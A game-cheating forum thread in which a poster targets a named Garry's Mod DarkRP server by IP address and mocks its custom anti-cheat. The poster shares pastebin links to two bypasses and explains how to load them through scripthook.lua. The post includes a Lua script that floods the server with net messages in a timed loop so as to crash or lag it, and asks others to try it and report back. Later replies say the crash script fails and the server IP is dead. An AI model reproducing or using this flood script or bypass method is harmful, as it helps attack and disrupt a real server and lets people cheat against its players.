ExclamationCustom AC Server bypass

Posts 17 of 7 · Page 1 of 1
Custom AC Server bypass
So I found this darkrp server with custom (shitty) anti cheat. Server is called Werwolf gaming, usually has +20 players. IP: 82.196.16.36:27015
They think their anti cheat is actually good and they got me perma banned for telling it gives error and they should buy a decent one lol.
Their anti cheat is in a lua file called Runstring and it only does a net.Start check at the start of the file (don't even hide it) xd.

AntiCheat code: pastebin(dot)com/CXM5JySx
AntiCheat bypass (simple): pastebin(dot)com/0yKJiP1R
AntiCheat bypass (not so simple I guess): pastebin(dot)com/yvCV4hfN

Just add one of those 2 bypasses to scripthook.lua and join the server now you can do whatever you want (you probably could before lol)
They are pretty confident about their anticheat they think it's actually decent so as long as you don't spinbot you won't get banned.

Haven't tested this but running it should crash/lag server (if u don't crash before it, just change the for value to less and keep trying)

local gay = {
"ok"
}

timer.Create("k", 2, 0, function()
for i=0, 1500 do
net.Start("_._._")
net.WriteTable(gay)
net.SendToServer()
end
end)


post results pls
Update: For some reason they also use this dumb shit in Cloud Gaming

nvm xd
does the bypass come with a mandatory tisker.dll?
The server crash script does nothin on any servers
Quote Originally Posted by killmenow_03 View Post
The server crash script does nothin on any servers
how come you're strugglin to bypass this garbage AC if you have a cac bypass?
Quote Originally Posted by Cyaegha View Post
how come you're strugglin to bypass this garbage AC if you have a cac bypass?
I said his script to possibly "crash the server" doesn't work you dumbass I didn't say I got banned or anything did I. Plus that server IP no longer works.
Quote Originally Posted by killmenow_03 View Post
I said his script to possibly "crash the server" doesn't work you dumbass I didn't say I got banned or anything did I. Plus that server IP no longer works.
Posts 17 of 7 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?